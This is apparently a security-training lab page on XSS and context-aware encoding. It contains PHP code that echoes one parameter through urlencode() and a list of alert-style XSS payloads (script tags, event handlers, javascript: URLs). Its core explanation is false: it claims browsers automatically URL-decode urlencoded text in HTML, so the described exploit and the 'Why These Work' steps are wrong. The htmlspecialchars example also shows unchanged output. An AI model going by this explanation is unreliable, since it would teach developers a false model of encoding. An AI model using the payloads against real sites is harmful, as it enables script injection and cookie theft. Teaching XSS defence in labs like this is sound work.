KrazePlanetLabs - Context-Aware Encoding XSS Lab

Context-Aware Encoding Challenge

Lab Overview

This lab demonstrates a critical security vulnerability where different encoding functions are used in the wrong context. The 'fname' parameter uses htmlspecialchars() (correct for HTML context), while 'lname' uses urlencode() (incorrect for HTML context).

Critical Vulnerability: Using urlencode() in HTML context provides no protection against XSS attacks. URL encoding is designed for URL contexts, not HTML content.

Parameter Security Levels:

Secure fname - Uses htmlspecialchars() (correct for HTML)

Vulnerable lname - Uses urlencode() (wrong for HTML context)

Common Mistake Using wrong encoding for output context

Context Matters Different contexts require different encoding

Encoding Function Comparison:

htmlspecialchars() - Correct for HTML:

Input: <script>alert(1)</script>

Output: <script>alert(1)</script>

Safe - Prevents XSS in HTML context

urlencode() - Wrong for HTML:

Input: <script>alert(1)</script>

Output: %3Cscript%3Ealert%281%29%3C%2Fscript%3E

Vulnerable - No protection against HTML XSS

Why urlencode() Doesn't Protect Against HTML XSS:

When the browser receives %3Cscript%3Ealert%281%29%3C%2Fscript%3E in HTML context, it decodes it back to:

<script>alert(1)</script>

This happens because URL encoding is automatically decoded by browsers when rendering HTML content.

Overall Security Level: Critical Vulnerability

Objective: Exploit the incorrect use of urlencode() in HTML context to execute XSS payloads through the 'lname' parameter.

Backend Source Code

if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo urlencode($_GET["lname"]);
}

Test Input Forms

XSS Payload Examples for URL-Encoded Parameter

Basic Script Tags:

<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>

Event Handlers:

<img src=x onerror=alert(1)>
<body onload=alert(1)>
<svg onload=alert(1)>

JavaScript Protocol:

<a href="javascript:alert(1)">click</a>
<iframe src="javascript:alert(1)"></iframe>

Advanced Techniques:

<object data="javascript:alert(1)"></object>
<embed src="javascript:alert(1)"></embed>

Why These Work:

When you submit <script>alert(1)</script> as the last name:

The server applies urlencode(): %3Cscript%3Ealert%281%29%3C%2Fscript%3E
The browser receives this in HTML context and automatically decodes it
The decoded content becomes: <script>alert(1)</script>
The browser executes the JavaScript

Security Implications

Using wrong encoding functions demonstrates:

Context-aware encoding is critical for security
urlencode() provides no XSS protection in HTML context
Inconsistent security implementations create vulnerabilities
Developers must understand output context for proper encoding
Automated URL decoding in browsers can bypass intended protection
Security controls must match the attack vector

Proper Encoding by Context

Use the right encoding for each context:

HTML Content: htmlspecialchars() or htmlentities()
HTML Attributes: htmlspecialchars(ENT_QUOTES)
URL Parameters: urlencode() or rawurlencode()
JavaScript Context: json_encode() or custom escaping
CSS Context: Custom CSS escaping
SQL Queries: Prepared statements (not encoding)

Real-World Impact & Prevention

Common Encoding Mistakes:

URL encoding in HTML: No XSS protection
HTML encoding in JavaScript: Syntax errors
No encoding in SQL: SQL injection risk
Inconsistent encoding: Mixed security levels

Impact of Wrong Encoding:

XSS vulnerabilities despite "encoding"
False sense of security
Session hijacking through cookie theft
Account takeover attacks
Complete application compromise

Prevention Strategies:

Context-aware encoding: Use the right function for each context
Security frameworks: Use frameworks that handle encoding automatically
Security training: Educate developers about context-aware encoding
Code review: Check encoding usage in security reviews
Automated testing: Test for XSS with various payloads
Security headers: Implement Content Security Policy (CSP)